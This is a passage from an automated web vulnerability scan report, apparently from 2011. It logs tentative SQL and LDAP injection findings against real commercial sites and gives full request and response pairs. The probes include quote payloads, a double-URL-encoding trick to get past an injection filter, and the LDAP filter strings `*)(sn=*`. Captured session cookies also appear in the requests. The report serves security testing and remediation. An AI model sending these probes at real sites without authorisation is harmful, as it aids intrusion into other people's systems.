error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/applesuperglobal%00''/1/H.20.3/s79162857956252?AQB=1&ndh=1&t=14/4/2011%205%3A29%3A21%206%20300&ce=ISO-8859-1&pageName=SEO-Software-US-Dow%20Jones%20%26%20Company%2C%20Inc.-WSJ%20House%20of%20the%20Day-418203198&g=http%3A//itunes.apple.com/us/app/wsj-house-of-the-day/id418203198&r=http%3A//online.wsj.com/article/SB10001424052748703730804576317293981683266.html&ch=SEO&products=Dow%20Jones%20%26%20Company%2C%20Inc.-WSJ%20House%20of%20the%20Day-418203198&h5=appleitmsna%2Cappleitmsus&c12=Mozilla/5.0%20%28Windows%20NT%206.1%3B%20WOW64%29%20AppleWebKit/534.24%20%28KHTML%2C%20like%20Gecko%29%20Chrome/11.0.696.68%20Safari/534.24&v12=Mozilla/5.0%20%28Windows%20NT%206.1%3B%20WOW64%29%20AppleWebKit/534.24%20%28KHTML%2C%20like%20Gecko%29%20Chrome/11.0.696.68%20Safari/534.24&c22=HTML&v22=HTML&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1020&bh=945&AQE=1 HTTP/1.1
Host: metrics.apple.com
Proxy-Connection: keep-alive
Referer: http://itunes.apple.com/us/app/wsj-house-of-the-day/id418203198
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ccl=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; geo=US; s_cc=true

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 11:31:03 GMT
Server: Omniture DC/2.0.0
xserver: www653
Content-Length: 0
Content-Type: text/html


1.89. http://om.dowjoneson.com/b/ss/djglobal,djwsj/1/H.3-pdv-2/s7523809753358 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://om.dowjoneson.com
Path:   /b/ss/djglobal,djwsj/1/H.3-pdv-2/s7523809753358

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /b%2527/ss/djglobal,djwsj/1/H.3-pdv-2/s7523809753358?[AQB]&ndh=1&t=14/4/2011%205%3A12%3A9%206%20300&vmt=44BD02B1&ns=dowjones&pageName=WSJ_Auth_WSJ/Barrons_Login_Page_Sub_with_Promo&g=http%3A//commerce.wsj.com/auth/login%3Fmg%3Dinert-wsj%26mod%3Dlogin_artpreview&r=http%3A//ad.doubleclick.net/adi/interactive.wsj.com/news_front%3B%21category%3D%3Bpage%3Darticle%3Bmsrc%3DWSJ_hp_LEFTTopStories%3B%3Bmc%3Db2pfreezone%3Btile%3D2%3Bsz%3D571x47%3Bord%3D4387438743874387%3B&cc=USD&ch=Online%20Journal&server=commerce.wsj.com&events=event12&c1=Customer%20Resources&h1=Online%20Journal%2CCustomer%20Resources%2CWSJ_Login%2CWSJ_Customer%20Resources_WSJ_Login_Login%2CWSJ_Auth_WSJ/Barrons_Login_Page_Sub_with_Promo%2Chttp%3A//commerce.wsj.com/auth/login&c2=WSJ_Login&h2=Online%20Journal%2Cmarketing%20and%20support%2CWSJ_Login%2CWSJ_Customer%20Resources_WSJ_Auth_WSJ/Barrons_Login_Page_Sub_with_Promo&c3=WSJ_Customer%20Resources_WSJ_Auth_WSJ/Barrons_Login_Page_Sub_with_Promo&h3=Online%20Journal%2CWSJ_Login%2CWSJ_Customer%20Resources_WSJ_Login_Login%2CWSJ_Auth_WSJ/Barrons_Login_Page_Sub_with_Promo&v4=WSJ_Auth_WSJ/Barrons_Login_Page_Sub_with_Promo&h4=Online%20Journal%2CWSJ_Login%2CCustomer%20Resources&c5=http%3A//commerce.wsj.com/auth/login&v5=login_artpreview&h5=Online%20Journal%2C%2CCustomer%20Resources%2CWSJ_Login%2CWSJ_Customer%20Resources_WSJ_Login_Login%2CWSJ_Auth_WSJ/Barrons_Login_Page_Sub_with_Promo&c6=http%3A//commerce.wsj.com/auth/login%3Fmg%3Dinert-wsj%26mod%3Dlogin_artpreview&c7=off&c8=Customer%20Resources&c9=free&c10=login_artpreview&v11=Online%20Journal&c19=marketing%20and%20support&c22=WSJ_Customer%20Resources_WSJ_Auth_WSJ/Barrons_Login_Page_Sub_with_Promo&v25=WSJ_WSJ_Login_WSJ_Customer%20Resources_WSJ_Login_Login&c26=WSJ_Customer%20Resources_WSJ_Login_Login&c27=WSJ_free&s=1920x1200&c=32&j=1.3&v=Y&k=Y&bw=1020&bh=945&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: om.dowjoneson.com
Proxy-Connection: keep-alive
Referer: http://commerce.wsj.com/auth/login?mg=inert-wsj&mod=login_artpreview
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72A64051D1F1F-4000010980086687[CE]

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 10:31:11 GMT
Server: Omniture DC/2.0.0
Content-Length: 444
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b%27/ss/djglobal,djwsj/1/H.3-pdv-2/s7523809753358 wa
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b%2527%2527/ss/djglobal,djwsj/1/H.3-pdv-2/s7523809753358?[AQB]&ndh=1&t=14/4/2011%205%3A12%3A9%206%20300&vmt=44BD02B1&ns=dowjones&pageName=WSJ_Auth_WSJ/Barrons_Login_Page_Sub_with_Promo&g=http%3A//commerce.wsj.com/auth/login%3Fmg%3Dinert-wsj%26mod%3Dlogin_artpreview&r=http%3A//ad.doubleclick.net/adi/interactive.wsj.com/news_front%3B%21category%3D%3Bpage%3Darticle%3Bmsrc%3DWSJ_hp_LEFTTopStories%3B%3Bmc%3Db2pfreezone%3Btile%3D2%3Bsz%3D571x47%3Bord%3D4387438743874387%3B&cc=USD&ch=Online%20Journal&server=commerce.wsj.com&events=event12&c1=Customer%20Resources&h1=Online%20Journal%2CCustomer%20Resources%2CWSJ_Login%2CWSJ_Customer%20Resources_WSJ_Login_Login%2CWSJ_Auth_WSJ/Barrons_Login_Page_Sub_with_Promo%2Chttp%3A//commerce.wsj.com/auth/login&c2=WSJ_Login&h2=Online%20Journal%2Cmarketing%20and%20support%2CWSJ_Login%2CWSJ_Customer%20Resources_WSJ_Auth_WSJ/Barrons_Login_Page_Sub_with_Promo&c3=WSJ_Customer%20Resources_WSJ_Auth_WSJ/Barrons_Login_Page_Sub_with_Promo&h3=Online%20Journal%2CWSJ_Login%2CWSJ_Customer%20Resources_WSJ_Login_Login%2CWSJ_Auth_WSJ/Barrons_Login_Page_Sub_with_Promo&v4=WSJ_Auth_WSJ/Barrons_Login_Page_Sub_with_Promo&h4=Online%20Journal%2CWSJ_Login%2CCustomer%20Resources&c5=http%3A//commerce.wsj.com/auth/login&v5=login_artpreview&h5=Online%20Journal%2C%2CCustomer%20Resources%2CWSJ_Login%2CWSJ_Customer%20Resources_WSJ_Login_Login%2CWSJ_Auth_WSJ/Barrons_Login_Page_Sub_with_Promo&c6=http%3A//commerce.wsj.com/auth/login%3Fmg%3Dinert-wsj%26mod%3Dlogin_artpreview&c7=off&c8=Customer%20Resources&c9=free&c10=login_artpreview&v11=Online%20Journal&c19=marketing%20and%20support&c22=WSJ_Customer%20Resources_WSJ_Auth_WSJ/Barrons_Login_Page_Sub_with_Promo&v25=WSJ_WSJ_Login_WSJ_Customer%20Resources_WSJ_Login_Login&c26=WSJ_Customer%20Resources_WSJ_Login_Login&c27=WSJ_free&s=1920x1200&c=32&j=1.3&v=Y&k=Y&bw=1020&bh=945&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: om.dowjoneson.com
Proxy-Connection: keep-alive
Referer: http://commerce.wsj.com/auth/login?mg=inert-wsj&mod=login_artpreview
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72A64051D1F1F-4000010980086687[CE]

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 10:31:11 GMT
Server: Omniture DC/2.0.0
xserver: www438
Content-Length: 0
Content-Type: text/html


1.90. http://sbklivequoteserverdl.smartmoney.com/livequote/tokenJSON [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://sbklivequoteserverdl.smartmoney.com
Path:   /livequote/tokenJSON

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /livequote'/tokenJSON?list=NLS:$I.DJI,$I.COMPX,$INX&jsoncallback=jQuery151023836345155723393_1305368029705&_=1305368029780 HTTP/1.1
Host: sbklivequoteserverdl.smartmoney.com
Proxy-Connection: keep-alive
Referer: http://www.smartmoney.com/invest/strategies/heavy-metal-debate-silver-vs-gold-1305310258887/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: djcs_route=65a08c08-94ef-4153-a49e-58cc26e0596f; smintromsg1=true; smintromsg1e=true; __utmz=205638161.1305368018.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vnum=1307960020151%26vn%3D1; s_dbfe=1305368020152; s_cc=true; s_invisit=true; s_sq=djglobal%2Cdjsm%3D%2526pid%253DSM_Home%252520Page_0_0_SH_0001%2526pidt%253D1%2526oid%253Dhttp%25253A//www.smartmoney.com/invest/strategies/heavy-metal-debate-silver-vs-gold-1305310258887/%2526ot%253DA; __utma=205638161.1117820965.1305368018.1305368018.1305368018.1; __utmc=205638161; __utmb=205638161.2.10.1305368018

Response 1

HTTP/1.0 500 Internal Server Error
Server: JRun Web Server
Date: Sat, 14 May 2011 10:20:30 GMT
Connection: close
Content-Type: text/html

<head><title>JRun Servlet Error</title></head><h1>500 Internal Server Error</h1><body>
No web application defined to service /livequote'/tokenJSON</body>

Request 2

GET /livequote''/tokenJSON?list=NLS:$I.DJI,$I.COMPX,$INX&jsoncallback=jQuery151023836345155723393_1305368029705&_=1305368029780 HTTP/1.1
Host: sbklivequoteserverdl.smartmoney.com
Proxy-Connection: keep-alive
Referer: http://www.smartmoney.com/invest/strategies/heavy-metal-debate-silver-vs-gold-1305310258887/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: djcs_route=65a08c08-94ef-4153-a49e-58cc26e0596f; smintromsg1=true; smintromsg1e=true; __utmz=205638161.1305368018.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vnum=1307960020151%26vn%3D1; s_dbfe=1305368020152; s_cc=true; s_invisit=true; s_sq=djglobal%2Cdjsm%3D%2526pid%253DSM_Home%252520Page_0_0_SH_0001%2526pidt%253D1%2526oid%253Dhttp%25253A//www.smartmoney.com/invest/strategies/heavy-metal-debate-silver-vs-gold-1305310258887/%2526ot%253DA; __utma=205638161.1117820965.1305368018.1305368018.1305368018.1; __utmc=205638161; __utmb=205638161.2.10.1305368018

Response 2

HTTP/1.1 400 Bad Request
Server: Apache-Coyote/1.1
Date: Sat, 14 May 2011 10:20:40 GMT
nnCoection: close
Content-Length: 0


1.91. http://search.twitter.com/search.json [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://search.twitter.com
Path:   /search.json

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /search.json?q=%22next%20top%20model%22%20OR%20%22nexttopmodel%22%20OR%20%22antm%22%20OR%20%22%2523antm%22&page=1&rpp=30&&&callback=twitterlib1305376448027 HTTP/1.1
Host: search.twitter.com
Proxy-Connection: keep-alive
Referer: http://www.fanpeeps.com/?action=tweets&pid=14&iid=4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24%2527
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: k=173.193.214.243.1305305564166059; __utmz=43838368.1305368954.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=43838368.1598605414.1305368954.1305368954.1305368954.1; __utmc=43838368; _twitter_sess=BAh7CToPY3JlYXRlZF9hdGwrCN5zDe4vAToMY3NyZl9pZCIlYWM1YmY4MDQz%250AZTBmM2ZjNjEwY2JjNWVhMTc3YzFlNTAiCmZsYXNoSUM6J0FjdGlvbkNvbnRy%250Ab2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA6B2lkIiVkYWRm%250ANDJhZTBkOTc0ZTVmY2ZhMjc5OTY5YmVjYTdiZg%253D%253D--1d8040b8314f051f527cc09828e06b740baadb22

Response 1

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:35:33 GMT
Server: hi
Vary: Accept-Encoding
Status: 200 OK
Content-Type: application/json; charset=utf-8
Cache-Control: max-age=15, must-revalidate, max-age=300
X-Varnish: 2087599046
Age: 0
Via: 1.1 varnish
X-Cache-Svr: smf1-aaz-23-sr2.prod.twitter.com
X-Cache: MISS
Expires: Sat, 14 May 2011 12:40:33 GMT
Connection: close
Content-Length: 84

twitterlib1305376448027({"error":"You have been rate limited. Enhance your calm."});

Request 2

GET /search.json?q=%22next%20top%20model%22%20OR%20%22nexttopmodel%22%20OR%20%22antm%22%20OR%20%22%2523antm%22&page=1&rpp=30&&&callback=twitterlib1305376448027 HTTP/1.1
Host: search.twitter.com
Proxy-Connection: keep-alive
Referer: http://www.fanpeeps.com/?action=tweets&pid=14&iid=4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24%2527%2527
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: k=173.193.214.243.1305305564166059; __utmz=43838368.1305368954.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=43838368.1598605414.1305368954.1305368954.1305368954.1; __utmc=43838368; _twitter_sess=BAh7CToPY3JlYXRlZF9hdGwrCN5zDe4vAToMY3NyZl9pZCIlYWM1YmY4MDQz%250AZTBmM2ZjNjEwY2JjNWVhMTc3YzFlNTAiCmZsYXNoSUM6J0FjdGlvbkNvbnRy%250Ab2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA6B2lkIiVkYWRm%250ANDJhZTBkOTc0ZTVmY2ZhMjc5OTY5YmVjYTdiZg%253D%253D--1d8040b8314f051f527cc09828e06b740baadb22

Response 2

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:35:33 GMT
Server: hi
Vary: Accept-Encoding
Status: 200 OK
Content-Type: application/json; charset=utf-8
Cache-Control: max-age=15, must-revalidate, max-age=300
X-Varnish: 1874525692
Age: 0
Via: 1.1 varnish
X-Cache-Svr: smf1-aaw-31-sr4.prod.twitter.com
X-Cache: MISS
Expires: Sat, 14 May 2011 12:40:33 GMT
Connection: close
Content-Length: 18300

twitterlib1305376448027({"results":[{"from_user_id_str":"291888395","profile_image_url":"http://a3.twimg.com/profile_images/1332411520/4_normal.JPG","created_at":"Sat, 14 May 2011 12:35:11 +0000","fro
...[SNIP]...

1.92. http://www.fanpeeps.com/ [pid parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.fanpeeps.com
Path:   /

Issue detail

The pid parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the pid parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /?pid=14' HTTP/1.1
Host: www.fanpeeps.com
Proxy-Connection: keep-alive
Referer: http://www.fanpeeps.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=9a60411f58fb3454c5f556257e253120; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.5.10.1305376380

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:34:00 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 17165

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

2. LDAP injection

There are 7 instances of this issue:

Issue background

LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.

Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Issue remediation

If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.


2.1. http://bs.serving-sys.com/BurstingPipe/adServer.bs [Pos parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The Pos parameter appears to be vulnerable to LDAP injection attacks.

The payloads 48213c807c01c96)(sn=* and 48213c807c01c96)!(sn=* were each submitted in the Pos parameter. These two requests resulted in different responses, indicating that the input may be incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /BurstingPipe/adServer.bs?cn=bsr&FlightID=2344126&Page=&PluID=0&Pos=48213c807c01c96)(sn=* HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.fins.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C4=; u2=d61a92e1-c563-4003-b380-e6f0a9dbf9f63I308g; A3=jtvLaMz402WG00001jFD.aMPk0cOm00001jxYPaMPg0doZ00001; B3=9xx40000000001uD9sKa0000000001uD9fOJ0000000001uC

Response 1

HTTP/1.1 302 Object moved
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Location: http://ds.serving-sys.com/BurstingRes/Site-28039/Type-0/6f381ac2-b744-46b5-8b0b-b6007baa08c9.gif
Server: Microsoft-IIS/7.5
Set-Cookie: A3=jtvLaMz402WG00001jFD.aMPj0cOm00001iuIZaMPo0aMI00001jxYPaMPg0doZ00001; expires=Fri, 12-Aug-2011 06:16:34 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=9xx40000000001uD8Yi+0000000001uD9sKa0000000001uD9fOJ0000000001uC; expires=Fri, 12-Aug-2011 06:16:34 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C_48213c807c01c96)(sn=*=4844349
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sat, 14 May 2011 10:16:34 GMT
Connection: close

Request 2

GET /BurstingPipe/adServer.bs?cn=bsr&FlightID=2344126&Page=&PluID=0&Pos=48213c807c01c96)!(sn=* HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.fins.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C4=; u2=d61a92e1-c563-4003-b380-e6f0a9dbf9f63I308g; A3=jtvLaMz402WG00001jFD.aMPk0cOm00001jxYPaMPg0doZ00001; B3=9xx40000000001uD9sKa0000000001uD9fOJ0000000001uC

Response 2

HTTP/1.1 302 Object moved
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Location: http://ds.serving-sys.com/BurstingRes/Site-28039/Type-0/6f381ac2-b744-46b5-8b0b-b6007baa08c9.gif
Server: Microsoft-IIS/7.5
Set-Cookie: A3=jtvLaMz402WG00001jFD.aMPj0cOm00001iuIZaMPo0aMI00001jxYPaMPg0doZ00001; expires=Fri, 12-Aug-2011 06:16:34 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=9xx40000000001uD8Yi+0000000001uD9sKa0000000001uD9fOJ0000000001uC; expires=Fri, 12-Aug-2011 06:16:34 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C_48213c807c01c96)!(sn=*=4844349
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sat, 14 May 2011 10:16:34 GMT
Connection: close


2.2. http://i1.marketwatch.com/MW5/content/business/css/marketwatch.member.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://i1.marketwatch.com
Path:   /MW5/content/business/css/marketwatch.member.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the REST URL parameter 1. The two requests resulted in different responses, which may indicate that the input is incorporated into a conjunctive LDAP query in an unsafe manner. Before accepting this, check the captured traffic: both responses are HTTP 404, and the Server and X-Machine headers show that they were served by different backend nodes (Microsoft-IIS/6.0 on SB-IMAGE1 returning its 1635-byte default error page, versus Microsoft-IIS/7.5 on SBKSIMGWEBP01 returning a 103-byte error page). A difference that tracks the node rather than the payload is consistent with load balancing across mixed IIS versions, so the finding should be re-tested against a single node, with a benign baseline value, before it is treated as LDAP injection.

Request 1

GET /*)(sn=*/content/business/css/marketwatch.member.css?stop=it HTTP/1.1
Host: i1.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Machine: SB-IMAGE1
X-Powered-By: ASP.NET
Date: Sat, 14 May 2011 10:12:54 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /*)!(sn=*/content/business/css/marketwatch.member.css?stop=it HTTP/1.1
Host: i1.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16

Response 2

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-MACHINE: SBKSIMGWEBP01
Content-Length: 103
Date: Sat, 14 May 2011 10:12:54 GMT
Connection: close
Vary: Accept-Encoding

The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.

2.3. http://i3.marketwatch.com/MW5/content/story/css/story-typography.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://i3.marketwatch.com
Path:   /MW5/content/story/css/story-typography.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to LDAP injection attacks.

